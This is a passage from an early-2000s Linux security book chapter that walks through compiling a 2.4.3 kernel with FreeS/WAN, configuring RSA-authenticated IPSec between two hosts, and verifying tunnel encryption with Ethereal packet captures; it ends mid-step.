linux-2.4.3.tar.gz tarball from the CD included +with this book and copy it to your /root directory. This lab is written for +Linux 2.4.3, which is the version on the CD. +8. Download the kernel to your home directory,such as /root as shown in +Figure 8.16.You can download and unpack the kernel in any directory +in which you have permissions,such as your home directory.In this +demonstration,the /root directory is used. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 409 +Creating Virtual Private Networks • Chapter 8 409 +Figure 8.15 Locating the linux-2.4.3.tar.gz Kernel +Figure 8.16 Downloading Kernel to Your Home (/root) Directory +9. On your system,access the /root directory by entering the following: +cd /root +10. Unpack the downloaded kernel by entering the following: +gzip –cd linux-2.4.3.tar.gz | tar xvf - +A /root/linux/ directory is created. +11. To remove stale .o files and dependencies,access the new linux directory +and run the make mrproper command.Enter the following commands: +cd /root/linux +make mrproper +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 410 +410 Chapter 8 • Creating Virtual Private Networks +NOTE +View the README file included with the unpacked kernel. The file +explains in detail the processes for installing the 2.4 kernel, which are +slightly different from previous releases. For instance, the Linux kernel +was unpacked in your home directory, not the /usr/src/ directory. In this +example, read the /root/linux/README file. This process will also ensure +that you do not overwrite your current system kernel. +12. Open the /root/linux/documentation/changes file and see which +updated packages are required to run the linux-2.4.3 kernel.For +instance,if you are upgrading from linux-2.2.16-22,you will need to +upgrade the following packages to these minimum versions: +(cid:2) util-linux 2.10o +(cid:2) modutils 2.4.2 +(cid:2) e2fsprogs 1.19 +(cid:2) pppd 2.4.0 +(cid:2) reiserfsprogs 3.x.0j-1 +13. Download the required RPMs at the RPM repository (http://rpmfind +.net/linux/RPM).These RPMs are also available on the CD accompa- +nying this book. +14. The RPM repository is shown in Figure 8.17.Search for the required +RPM by entering its name in the Search field,and clicking the Search +button. +15. For instance,if you are upgrading from linux-2.2.16.22,you need to +download the following RPMs,which are also available on the CD +accompanying this book: +(cid:2) util-linux-2.10s-12.i386.rpm +(cid:2) modutils-2.4.2-5.i386.rpm +(cid:2) e2fsprogs-1.19-4.i386.rpm +(cid:2) ppp-2.4.0-2.i386.rpm +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 411 +Creating Virtual Private Networks • Chapter 8 411 +Figure 8.17 Searching for RPMs at the RPM Repository on +rpmfind.net +16. Install each RPM using the rpm -U command.For instance,to install +the RPMs listed in the previous step,you would enter the following: +rpm –U util-linux-2.10s-12.i386.rpm +rpm –U modutils-2.4.2-5.i386.rpm +rpm –U e2fsprogs-1.19-4.i386.rpm +rpm –U ppp-2.4.0-2.i386.rpm +17. After updating the required RPMs,you are ready to compile the kernel. +The easiest way to configure the kernel is to enter X Windows.If you +are not already in X Windows,enter the following: +startx +18. Access the new linux directory,which is the required location for this +kernel configuration.Enter the following: +cd /root/linux +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 412 +412 Chapter 8 • Creating Virtual Private Networks +19. Open the Linux Kernel Configuration GUI.This program allows you +to choose kernel options for your system.Open it by entering the +following: +make xconfig +The Linux Kernel Configuration GUI appears,as shown in +Figure 8.18. +Figure 8.18 Configuring the Linux Kernel by Using xconfig +20. Click the Loadable module support button. +21. The Loadable module support configuration screen appears.Select Y +for all three options,as shown in Figure 8.19.If they are already selected, +then you do not have to change the configuration options. +Figure 8.19 Configuring Loadable Module Support in the +Linux Kernel +22. Click the Main Menu button to return to the Linux Kernel +Configuration screen. +23. Select the Processor type and features button.In the Processor +family drop-down menu,select the process type running on your +system.For the first time,modern PC processors are listed,such as +the Pentium III and IV,as well as the AMD Athlon/K7.Many times, +Linux installs using the i386 processor,even though your system may be +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 413 +Creating Virtual Private Networks • Chapter 8 413 +running a more modern processor.Selecting the correct processor type +will increase system performance.The Processor type and features +screen is shown in Figure 8.20. +Figure 8.20 Configuring Processor Type +24. Click the Main Menu button to return to the Linux Kernel +Configuration screen. +25. Click the Network device support button and select the Ethernet +(10 or 100Mbit) option.Select your NIC from the list of available +options.The PCI NE2000 and clones support usually works for PCI +cards that are not specifically listed.If this is what you require,select Y, +as shown in Figure 8.21. +Figure 8.21 Selecting the PCI NE2000 and Clones NIC +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 414 +414 Chapter 8 • Creating Virtual Private Networks +26. Click the OK button and then the Main Menu button. +27. Make any additional changes required for your system.For instance,if +you want printer support,you must activate Parallel port support from +the Main Menu and select the Y option. +28. Click the Save and Exit button.You will receive a message stating “End +of Linux kernel configuration.”Click the OK button. +29. The kernel configurations are saved in the file /root/linux/.config. +30. Continue to run commands from the /root/linux directory. +31. Run the make dep command,which finds dependencies between the +files.Enter the following: +make dep +32. Run the make bzImage command,which builds a loadable image of +the kernel.It compresses the image with bzip.Enter the following: +make bzImage +33. The bzImage file is created and placed in /linux/arch/i386/boot/ +bzImage. +NOTE +At the end of the make bzImage process, you may receive a warning +(especially if you have installed a large number of kernel options) stating +“warning: kernel is too big for standalone boot from floppy.” If you +receive this warning, you need to copy the image to the hard drive and +boot up with lilo. +34. Continue to run commands from the /root/linux directory. +35. Run the command make install by entering the following: +make install +36. Now that you have made a kernel,create the modules by entering the +following: +make modules +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 415 +Creating Virtual Private Networks • Chapter 8 415 +37. To install the modules in the proper subdirectories,enter the following: +make modules_install +38. To boot into the new kernel,you must copy the kernel image to either +a floppy disk or to your hard drive.This depends on how you usually +boot up Linux. +39. If you use a boot disk,then copy the image to a new floppy disk.The +floppy disk must be high density.Then create a boot disk,insert a new +HD floppy disk,and enter the following: +cp /root/linux/arch/i386/boot/bzImage /dev/fd0 +Leave the floppy boot disk in your system and reboot the system +from the floppy boot disk. +40. If you boot from your hard drive,your system uses lilo.The lilo configura- +tions are specified in /etc/lilo.conf.The lilo.conf file specifies kernel +images that are located in the /boot directory.During the installation pro- +cess,the bzImage file was copied to the /boot directory and renamed +vmlinuz-2.4.3.It can be named anything you want,as long as you specify +the name and location in the lilo.conf file (which you will do in Step 42). +41. To specify your new image in the /etc/lilo.conf file,enter the following: +vi /etc/lilo.conf +42. Press I to insert text.Insert the following text at the end of the file to +identify the new kernel image (your entry may vary due to different +partitions): +image=/boot/vmlinuz-2.4.3 +label=linux-2.4.3 +read-only +root=/dev/hda5 +Your lilo.conf file should resemble Figure 8.22. +43. Press ESC to exit insert mode.Write and quit the file by entering the +following: +:wq +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 416 +416 Chapter 8 • Creating Virtual Private Networks +Figure 8.22 Configuring /etc/lilo.conf to Access the New +Kernel Image +44. To load your lilo.conf changes,enter the following command: +lilo +You should receive the following response: +Added linux * +Added linux-2.4.3 +45. You are ready to reboot the system and test to see if the new kernel +works. +46. Reboot the system. +47. At the lilo prompt,the kernel image labels are presented.If not,select +the TAB key.Two options will be available to you:the original linux +kernel and the new linux-2.4.3 kernel you just configured.Select the +linux-2.4.3 kernel. +48. The system should boot properly.If you receive errors when booting the +new kernel,reboot using the old kernel image and access the /root/ +linux/README file.To find out more about kernel configuration com- +mands and troubleshooting problems,visit www.linuxdoc.org/ +HOWTO/Kernel-HOWTO.html (be aware,however,that the +HOWTO documents are not always up-to-date). +49. Log in as root.You should be successful. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 417 +Creating Virtual Private Networks • Chapter 8 417 +Recompiling FreeS/WAN into the New Kernel +Congratulations! You have successfully created and tested a new kernel image for +your system.This will make any troubleshooting of FreeS/WAN much easier, +because you know that the compiled kernel works.If you skipped the last section +because you compiled your kernel in the past (you have a .config file in your +/usr/src/linux directory),then you do not have to reconfigure the FreeS/WAN +Makefile.Skip to Step 7 in the following demonstration and use /usr/src/ +freeswan-1.9 instead of the /root/freeswan-1.9 directory for the remainder of +the section. +1. Reboot the system and log in to the original kernel as root.Do not use +the new kernel for the following steps. +2. Access the freeswan directory by entering the following (your version +may vary): +cd root/freeswan-1.9 +3. Open the /root/freeswan/Makefile by entering the following: +vi Makefile +4. You need to change the kernel source location where FreeS/WAN +looks for the kernel.By default,FreeS/WAN looks in the /usr/src/linux +directory.However,you compiled your new kernel in /root/linux. +Therefore,you need to change the Makefile to reflect your kernel +source location.To change the kernel source location,scroll down the +file and locate the following comment: +# kernel location, and location of kernel patches in the +distribution +KERNELSRC=/usr/src/linux +5. Change the kernel source location by pressing I to enter vi’s insert +mode,then change the location to the following: +KERNELSRC=/root/linux +Your file should resemble Figure 8.23. +6. To save and exit the file,press ESC and enter the following: +:wq +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 418 +418 Chapter 8 • Creating Virtual Private Networks +Figure 8.23 Changing the FreeS/WAN Makefile Kernel +Source Location +7. To add the FreeS/WAN default settings into your Linux kernel’s .config +file,enter the following command in the /root/freeswan-1.9 directory: +cd /root/freeswan-1.9 +make oldgo +This command installs default FreeS/WAN configurations to the +linux-2.4.3 kernel you created.To complete the FreeS/WAN kernel +configuration,enter the following in the /root/freeswan-1.9 directory: +make kinstall +NOTE +When the make kinstall command is run from the freeswan directory, it +performs the same make commands that you usually run from the /linux +directory to configure and install your kernel. It runs the equivalent +make commands: +make +make install +make modules +make modules_install +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 419 +Creating Virtual Private Networks • Chapter 8 419 +8. The lilo.conf file already specifies the new kernel image location. +However,you can enter the lilo command to ensure that it is up-to-date +by entering the following: +lilo +You should receive the following response: +Added linux * +Added linux-2.4.3 +9. You are ready to reboot the system and test whether the new kernel +works. +10. Reboot the system into the new linux-2.4.3 kernel image. +11. During the reboot,check the messages during boot.You can also check +them using dmesg.Look for the following: +(cid:2) Make sure that you are booting into the new kernel. +(cid:2) Make sure that a message appears for KLIPS initialization. +(cid:2) Make sure that a start report appears for Pluto. +(cid:2) Make sure that “ipsec_setup – Starting FreeS/WAN IPsec 1.9” +appears. +12. Log in as root. +13. Test the IPSec commands shown in Table 8.4 (just make sure that you +get a response). +Table 8.4 Commands to Test if IPSec Is Working +Command Description +ipsec -version Shows the FreeS/WAN version, which tests the +/usr/local/bin path for IPSec admin commands. +ipsec whac --kstatus Command used for status information for Pluto. +14. If the FreeS/WAN kernel implementation is successful,you are ready to +continue.Please note that you need a second system setup with +FreeS/WAN to create a VPN. +15. If you are not successful,please view the Linux FreeS/WAN online doc- +umentation at www.freeswan.org/doc.html.It provides a documentation +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 420 +420 Chapter 8 • Creating Virtual Private Networks +tree with a troubleshooting section,as shown in Figure 8.24.The specific +address is:www.freeswan.org/freeswan_trees/freeswan-1.9/doc/ +trouble.html +Figure 8.24 Troubleshooting Tips for Linux FreeS/WAN +Configuring FreeS/WAN +After you have compiled FreeS/WAN into your Linux kernel and confirmed +that IPSec,KLIPS,and Pluto are running,you are ready to configure the pro- +gram.Any IPSec implementation requires that you first test IP networking on the +gateways,or hosts,at each tunnel endpoint.The reason is because IPSec does not +work unless a functional IP network is working underneath it. +In this section,you will configure FreeS/WAN between two hosts,which is a +host-to-host VPN solution.In an enterprise environment,these hosts would be +the VPN gateways into the network.In a telecommuter environment,one host +would be the telecommuter,and the other would be the VPN gateway to the +company network. +Testing IP Networking +To create a host-to-host VPN solution,both systems must have FreeS/WAN +properly installed and tested.Next,you must ensure that IP networking is +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 421 +Creating Virtual Private Networks • Chapter 8 421 +functioning.For this demonstration,you will also capture HTTP packets between +the hosts.This capture will allow you to compare and prove that IPSec is func- +tioning after the tunnel is created between the hosts. +To test IP networking,make sure that each host can ping the others.If suc- +cessful,access the default Apache Web page on one of the hosts and capture the +transmission.View the packet capture to confirm that the packets are not +encrypted.This process is documented in the following steps: +1. For this demonstration,we must define our VPN host1 and host2.Write +your host1 and host2 in the space provided.From this point forward,the +hosts will be referred to as host1 and host2. +host1 = we-24-130-8-170.we.mediaone.net ______________________ +host2 = we-24-130-10-205.we.mediaone.net _____________________ +2. Confirm that host1 and host2 are booted into the new kernel that is +configured with FreeS/WAN. +3. Confirm that host1 and host2 have FreeS/WAN properly installed +and tested. +4. Test connectivity between host1 and host2 using ping.For instance, +enter the following from host1: +ping host2 +From host2,enter: +ping host1 +You should be successful.If not,troubleshoot your network until you +gain connectivity between the two hosts. +5. Host2:Make sure that Apache is installed by entering the following: +rpm –qa | grep apache +6. Host2:You should receive a response similar to the following if Apache +is installed: +apache-manual-1.3.12-25 +apache-1.3.12-25 +apache-devel-1.3.12-25 +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 422 +422 Chapter 8 • Creating Virtual Private Networks +7. Host2:If you do not receive a response,then you need to download and +install Apache. +8. Host2:After you confirm that Apache is installed and running,you have +completed Apache configuration.This is because host1 will access the +default Web site that Apache configures automatically upon installation. +9. Host1:Capture HTTP packets between your Web browser and the +Apache Web server on Host2.To accomplish this task,you must first set +up a packet capture filter between host1 and host2 using Ethereal.To set +up the filter,complete the following steps: +10. Host1:Verify that the Ethereal RPM is installed on the system by +entering the following: +rpm –qa | grep ethereal +11. Host1:If you do not receive a reply,then you need to download and +install Ethereal (www.rpmfind.net).You can also install it from your +PowerTools CD that is distributed with Red Hat Linux. +12. Host1:After you have verified that Ethereal is installed,you are ready to +capture packets. +13. Host1:To add filters to Ethereal without using host names,open a com- +mand interface and enter the following: +ethereal -n +14. Host1:From the Edit menu,choose Filters.The Ethereal:Filters screen +appears.Because no filters have been configured,the configuration +screen is blank. +15. Host1:To create a filter that allows only traffic between your host and +another host,you must add a filter name and a filter string.For instance, +to create a filter between two hosts (host1 and host2),enter the filter +name HTTP Capture and filter string shown in Figure 8.25.Please +note that your IP addresses will not be the same. +16. Host1:After the two fields are complete,you must click the Save button +and then click the New button.Click the OK button to exit. +17. Host1:To start a packet capture,simply choose Start from the Capture +menu.The Capture Preference screen appears.Click the Filter button +and choose the HTTP Capture filter that you created.Click the OK +button twice,and the capture starts. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 423 +Creating Virtual Private Networks • Chapter 8 423 +Figure 8.25 Creating a Filter between Two Hosts +18. Host1:To generate the HTTP packets,open the browser and access +the default Web page on the host2 Web server.For instance,enter the +following:http://we-24-130-10-205.we.mediaone.net. +19. Host1:The default Web page on the host2 Web server appears,as shown +in Figure 8.26. +Figure 8.26 Accessing the Default Web Page on the host2 +Web Server +20. Host1:Close the browser. +21. Host1:Stop the Ethereal packet capture by clicking the Stop button. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 424 +424 Chapter 8 • Creating Virtual Private Networks +22. Host1:The packet capture appears in Ethereal.The transmission is not +encrypted.All application data is displayed,as well as the port numbers. +Your screen will resemble Figure 8.27,which highlights the first HTTP +packet. +23. Host1:Save the packet capture as unsecHTTP and quit Ethereal.A +sample unsecHTTP file is included on the CD accompanying this book. +Figure 8.27 Capturing an HTTP Session without FreeS/WAN +You have successfully tested IP networking between the two VPN hosts.You +also captured HTTP packets between the two hosts to prove that a VPN tunnel +has not yet been configured.When the VPN tunnel is configured,all traffic +between the two hosts will be encrypted,regardless of the applications running +between the hosts. +Configuring Public Key Encryption for +Secure Authentication of VPN Endpoints +You have tested and confirmed that an HTTP daemon and browser can commu- +nication between host1 and host2.Do not proceed in this chapter until this works. +This proves that the hosts can communicate without IPSec and will make trou- +bleshooting any problems far easier.The next goal will be to have host1 and +host2 communicate with the FreeS/WAN IPSec implementation. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 425 +Creating Virtual Private Networks • Chapter 8 425 +For IPSec to work,you have to set up public key encryption.As you learned +in Chapter 7,public key encryption uses private and public keys to ensure authen- +tication.The private key is known only by the host,and the public key is available +to everyone else,such as all hosts that the system will communicate with. +NOTE +The U.S. patent on the RSA algorithm expired on September 20, 2000. +Therefore, RSA is used for the public key encryption in FreeS/WAN and +will be incorporated into many additional open source programs as they +are developed and new versions are released. +An RSA key pair was created during the FreeS/WAN installation process. +The key pair is placed in the /etc/ipsec.secrets file.This file must be kept secure +because your private key is listed within it.Only you,the superuser,should have +access to this /etc/ipsec.secrets file. +The public key should be placed in the /etc/ipsec.conf file.Because the +public key is available to anyone with whom you communicate,security is not as +important for the /etc/ipsec.conf file.The private and public key locations for +FreeS/WAN are summarized in Table 8.5. +Table 8.5 Location of RSA Key Pair for FreeS/WAN +Key File Name Location on Host +Private key ipsec.secrets /etc/ipsec.secrets +Public key +Public key ipsec.conf /etc/ipsec.conf +You will configure these files in the following steps on host1 and host2 so that +you can start the tunnel.Complete the following steps to configure your systems +for FreeS/WAN.FreeS/WAN and IPSec refer to the VPN endpoints as the “left” +and “right”hosts.In this section’s demonstration,host1 is left,and host2 is right. +1. Host1:First,you will configure the /etc/ipsec.secrets file,which lists +your system’s public and private keys.Open the file by entering the +following: +vi /etc/ipsec.secrets +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 426 +426 Chapter 8 • Creating Virtual Private Networks +Your file will resemble the one shown in Figure 8.28. +Figure 8.28 Configuring the /etc/ipsec.secrets File +2. Host1:You are using public key authentication,so you need to comment +out (#) the line indicating the “Shared secret.”To do this,press I and +comment out the last line in the second paragraph of the file,as follows +(your arbitrary character string may vary): +# Shared secret (an arbitrary character string, which should be +# both long and hard to guess, enclosed in quotes) for a pair +# of negotiating hosts. +# Must be same on both; generate on one and copy to the other. +# 10.0.0.1 10.12.12.1 : PSK +# "jxmWkkWmm4uV1m4SW3SuUWU1233Wu5S5U3S…" +3. Host1:Notice the public and private key listed in the file.Pluto,which +is the IKE implementation on FreeS/WAN,uses these keys to authenti- +cate hosts with your system. +4. Host1:Press ESC,then write and quit the file by entering the following: +:wq +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 427 +Creating Virtual Private Networks • Chapter 8 427 +NOTE +IPSec (and FreeS/WAN) use RSA keys by default for authentication +between the VPN hosts. Encryption is accomplished by default through +3DES. +5. Host1:Next,you will configure the /etc/ipsec.conf file,which lists the +configuration and connection information for IPSec. +6. Host1:Make a backup copy of the /etc/ipsec.conf file and name it +ipsec.conf-backup.The ipsec.conf file is actually a sample file that you +must configure.Enter the following: +cp /etc/ipsec.conf /etc/ipsec.conf-backup +7. Open the /etc/ipsec.conf file by entering the following: +vi /etc/ipsec.conf +8. Host1:Your file will resemble the file shown in Figure 8.29 (Figure 8.30, +displayed later in this section,displays the remainder of the file,which +has three main sections). +Figure 8.29 Configuring the /etc/ipsec.conf File +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 428 +428 Chapter 8 • Creating Virtual Private Networks +9. Host1:As you can see in Figure 8.29,/etc/ipsec.conf is the main +FreeS/WAN IPSec configuration file,which has three parts.The “basic +configuration”and “defaults for subsequent connection descriptions” +sections are shown in the figure.The “connection”section is discussed +after these two sections are completed. +NOTE +For more information on the configuration options for ipsec.conf, see +the following documents: +(cid:2) www.freeswan.org/freeswan_trees/freeswan-1.9/doc/manpage.d/ +ipsec.conf.5.html +(cid:2) man ipsec.conf +(cid:2) /root/freeswan-1.9/doc/examples +10. Host1:Read the “basic configuration”section as follows.You do not +need to make any changes to this section of the file.Additional com- +ments are here for your understanding: +# basic configuration +config setup +# THIS SETTING MUST BE CORRECT or almost nothing will work. +# %defaultroute is okay for most simple cases. This defines the +# interfaces that IPsec uses. For instance, you could add +# "ipsec0=eth0" for the interfaces value as well. +interfaces=%defaultroute +# Debug-logging controls: Specifies how much KLIPS and Pluto +# debugging output will be logged. Defaults to "none". +# Enter "none" for (almost) none, "all" for lots. +klipsdebug=none +plutodebug=none +# Plutoload specifies a connection name (identified in the third +# section of this file) that will be loaded into the internal +# database at startup. It does not attempt to start the +# connection until summoned. +plutoload=host-to-host +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 429 +Creating Virtual Private Networks • Chapter 8 429 +# Close down old connection when new one using same +# ID showns up. +uniqueids=yes +11. Host1:You must modify the “defaults for subsequent connection +descriptions”section.The configurations you enable here will determine +how the following “connections”section will behave.Because you are +using public key cryptography,you do not require the manual-key +testing entries.The section should read as follows (you do not need to +enter the comments): +# defaults for subsequent connection descriptions +conn %default +# How persistent to be in (re)keying negotiations (0 means +# very). +Keying tries=0 +# Indicates that RSA authentication will be used for the VPN +# connection. To generate your public key, open a terminal and +# enter 'ipsec showhostkey'. Copy your public key to the +# leftrsasigkey value. Copy the public key of host2 to the +# rightrsasigkey. +authby=rsasig +leftrsasigkey= +rightrsasigkey= +NOTE +The host1 public key is also listed in the /etc/ipsec.secrets file and begins +with #pubkey=0x” (see Figure 8.28). Only the hexadecimal portion is +required, not the #pubkey=” portion. You can copy the public key from +host1 from this file and paste it into the leftrsasigkey= value. You may +want to use a text editor other than vi to copy and paste the public key. +12. Host1:You must modify the “sample connection”section so that it +applies to a host-to-host connection.The connection section is shown in +Figure 8.30. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 430 +430 Chapter 8 • Creating Virtual Private Networks +Figure 8.30 Configuring the Connection Section of the +/etc/ipsec.conf File +NOTE +If you were configuring VPN gateways for a network, you would enter +the “leftsubnet” and “rightsubnet” options (shown in Figure 8.30). These +options identify the LAN network address that the gateway is attached +to. If you were configuring a VPN involving a telecommuter, you would +identify the subnet on only one side, because the telecommuter has no +gateway, it is a host. +13. Host1:Modify the connection section for a host-to-host VPN solution. +Modify the section as follows (you do not need to enter the comments): +# host-to-host tunnel (no subnets) +# In this demonstration, the hosts talk directly to each other, +# so next-hop settings are not required. The name of this +# connection is "host-to-host." +conn host-to-host +# The left host is the IP address of host1. +left=24.130.8.170 +# Next hop to reach the right host — no value required because +# hosts are on the same network. +leftnexthop= +# The right host is the IP address of host2 +right=24.130.10.205 +# Next hop to reach the left host — no value required because +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 431 +Creating Virtual Private Networks • Chapter 8 431 +# hosts are on the same network. +rightnexthop= +14. Host1:Press ESC,then write and quit the file by entering the following: +:wq +15. Host1:Copy the /etc/ipsec.conf file from host1 and transfer it to host2. +Doing so will save you a lot of time and effort. +NOTE +If you have security concerns, you can configure the /etc/ipsec.conf file +separately on host2. Then, copy the public key of host1 to a text file and +name it host1.pub. (A sample host1.pub file is included on the CD +accompanying this book). The public key is the line in the output of the +/etc/ipsec.secrets file that begins with #pubkey=0x” (see Figure 8.28). +Only the hexadecimal portion is required, not the #pubkey=” portion. +Then transfer the host1.pub file to host2 and place it in the +/etc/ipsec.conf file. As usual, authentication of public keys is essential to +ensure that you are not tricked into accepting a public key from a hacker. +Make sure that you are certain the public key is from host1. +16. Host2:Log in to host2 as root using the FreeS/WAN-enabled kernel. +17. Host2:Make a backup copy of the /etc/ipsec.conf file and name it +ipsec.conf-backup.The ipsec.conf file is actually a sample file that you +must configure.Enter the following: +cp /etc/ipsec.conf /etc/ipsec.conf-backup +18. Host2:Replace the host2 /etc/ipsec.conf file with the host1 ipsec.conf +file.You need to add only the host2 public key to the rightrsasigkey= +value,which you will do in the following steps. +19. Host2:Open the /etc/ipsec.secrets file by entering the following: +vi /etc/ipsec.secrets +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 432 +432 Chapter 8 • Creating Virtual Private Networks +20. Host2:Similar to host1,comment out (#) the line indicating the “Shared +secret”.To do this,press I and comment out the last line in the second +paragraph of the file,as shown (your arbitrary character string may vary): +# Shared secret (an arbitrary character string, which should be +# both long and hard to guess, enclosed in quotes) for a pair +# of negotiating hosts. +# Must be same on both; generate on one and copy to the other. +# 10.0.0.1 10.12.12.1 : PSK +# "jxmWkkWmm4uV1m4SW3SuUWU1233Wu5S5U3S…" +21. Host2:Copy the public key of host2.The public key is the line in the +output of the /etc/ipsec.secrets file that begins with #pubkey=0x”.Only +the hexadecimal portion is required,not the #pubkey=” portion. +22. Host2:Paste the public key of host2 to the /etc/ipsec.conf rightrsasigkey= +value.You may want to use a text editor other than vi to copy and paste +the public key.Both public keys for host1 and host2 should now be +listed in the file. +23. Host2:Write and quit both the /etc/ipsec.secrets and the /etc/ipsec.conf +file. +24. Host2:Transfer the host2 public key to host1.For instance,copy the +public key of host2 to a text file and name it host1.pub,(a sample +host1.pub file is included on the CD accompanying this book),or copy +the /etc/ipsec.conf file to host1.The file will be exactly the same on +both hosts,so this method is possible. +25. Host1:Copy the public key of host2 to the /etc/ipsec.conf +rightrsasigkey= value. +26. Host1 and Host2:The ipsec.conf file on both host1 and host2 should be +identical.Figures 8.31 through 8.33 display the completed ipsec.conf file +for the host-to-host tunnel for two mediaone.net endpoints.A sample +ipsec.conf file is included on the CD accompanying this book. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 433 +Creating Virtual Private Networks • Chapter 8 433 +Figure 8.31 Final Configurations for the “Basic Configuration” +Section of the /etc/ipsec.secrets File +Figure 8.32 Final Configurations for the “Defaults for Subsequent +Connection Descriptions” Section of the /etc/ipsec.conf File +Figure 8.33 Final Configurations for the “Connection (Host-to-Host +Tunnel)” Section of the /etc/ipsec.conf File +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 434 +434 Chapter 8 • Creating Virtual Private Networks +Starting the Tunnel +Congratulations.Both /etc/ipsec.conf and /etc/ipsec.secret files on host1 and +host2 are configured with each other’s public keys.Now you must create the +tunnel.The commands used to start,stop,and maintain the tunnel are IPSec +commands.Table 8.6 displays common IPSec commands. +Table 8.6 Common IPSec Commands +Command Description +ipsec auto --up Requests Pluto to establish a connection +(tunnel) using data stored in its internal +database. +ipsec auto --down Requests Pluto to close a connection (tunnel). +ipsec auto --rereadsecrets Request Pluto to reread the /etc/ipsec.secrets +file. +ipsec look Lists a minimal amount of debugging informa- +tion. Main use is to provide a quick look at +current connections. +ipsec barf Lists all debugging information related to +IPSec, including encryption and authentication +data. +ipsec pluto The IPSec Key Exchange (IKE) daemon +command. The IPSec auto commands are more +convenient for establishing and closing IKE +connections. +ipsec whack Provides a control interface for IPSec keying +daemons, which is Pluto in FreeS/WAN. The +IPSec auto commands are more convenient for +establishing and closing IKE connections. +ipsec --help Most IPSec commands have their own man +pages. The --help option lists all the IPSec +commands. +ipsec --version Lists the FreeS/WAN version number. +ipsec --copyright Lists the copyright information. +Most IPSec commands have their own man pages.For a listing,visit +www.freeswan.org/freeswan_trees/freeswan-1.9/doc/manpages.html.You can also +view the IPSec man page.It lists the associated IPSec commands that have their +own man pages. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 435 +Creating Virtual Private Networks • Chapter 8 435 +The following steps will demonstrate how to start the tunnel using IPSec +commands: +1. Host1 and Host2:Reboot the systems and make sure that you load the +FreeS/WAN-enabled kernel.The reboot loads your “host-to-host”con- +nection that you specified in the /etc/ipsec.conf file into Pluto’s internal +database at startup.Recall the plutoload=host-to-host line. +2. Host1 and Host2:Examine /var/log/messages for any IPSec errors. +3. Host1 and Host2:Check that the following entries exist in /proc/net/ +directory: +ipsec_version +ipsec_tncfg +ipsec_eroute +ipsec_spi +ipsec_spigrp +4. Host1 and Host2:Check for the IPSec virtual interface on the host. +Enter the following: +cat /proc/net/ipsec_tncfg +5. Host1 and Host2:ipsec0 should be listed.It will point to your physical +interface,such as eth0.For instance,it will read as follows: +ipsec0 -> eth0 mtu=16260 -> 0 +ipsec1 -> NULL mtu=0 -> 0 +ipsec2 -> NULL mtu=0 -> 0 +ipsec3 -> NULL mtu=0 -> 0 +The ipsec0 pseudo-device uses the FreeS/WAN eroute utility.This +routes all connections through this device and encrypts it before sending +it to the underlying physical interface. +6. Host1:On one of the hosts,start the tunnel by entering the following: +ipsec auto –-up host-to-host +where host-to-host is the name of the connection you created in the +ipsec.conf file. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 436 +436 Chapter 8 • Creating Virtual Private Networks +7. Host1:If no errors are supported,the VPN tunnel should be established. +Enter the following command to observe the connection configuration: +ipsec look +8. The response from both ipsec commands should resemble Figure 8.34.If +you receive a similar response,your VPN tunnel is established between +the hosts. +Figure 8.34 Starting and Confirming the Establishment of a +Host-to-Host VPN Tunnel +Capturing VPN Tunnel Traffic +To ensure that your VPN is actually encrypting traffic between the hosts,you +need to capture packets using the HTTP Capture filter you created in the +“Testing IP Networking”section of this chapter.Complete the following steps to +prove that the VPN is indeed functioning.Any traffic you send between the hosts +will be encrypted. +1. Host1:Open Ethereal without using host names,open a command +interface,and enter the following: +ethereal -n +2. Host1:To start a packet capture,simply choose Start from the Capture +menu.The Capture Preference screen appears.Click the Filter button +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 437 +Creating Virtual Private Networks • Chapter 8 437 +and choose the “HTTP Capture”filter that you created.Click the OK +button twice,and the capture starts. +3. Host1:To generate the HTTP packets,open the browser and access +the default Web page on the host2 Web server.For instance,enter the +following: +http://we-24-130-10-205.we.mediaone.net +4. Host1:The default Web page on the host2 Web server appears. +5. Host1:Close the browser. +6. Host1:Stop the Ethereal packet capture by clicking the Stop button. +7. Host1:The packet capture appears in Ethereal.The transmission is +encrypted.No application data or port numbers are displayed.Your +screen will resemble Figure 8.35,which highlights the first encrypted +packet.In this case,ESP uses 3DES for packet encryption and MD5 for +packet authentication. +Figure 8.35 Capturing an HTTP Session with a FreeS/WAN +Host-to-Host VPN +8. Host1:Save the packet capture as tunntraf and quit Ethereal.A sample +tunntraf file is included on the CD accompanying this book. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 438 +438 Chapter 8 • Creating Virtual Private Networks +You have successfully implemented a VPN host-to-host solution over an +unsecured network.You captured HTTP packets between the two hosts to prove +that a VPN tunnel has not only been configured,but that it works.When the +VPN tunnel is configured,all traffic between the two hosts is encrypted,regard- +less of the applications running between the hosts. +Closing the VPN Tunnel +To close the VPN tunnel,you must close the connection from both endpoints of +the tunnel.Even though you started the VPN tunnel from one endpoint,both +endpoints must terminate the connection.It can be terminated by completing +the following steps: +1. Host1:To close the VPN tunnel from host1,enter the following: +ipsec auto --down host-to-host +2. Host2:To close the VPN 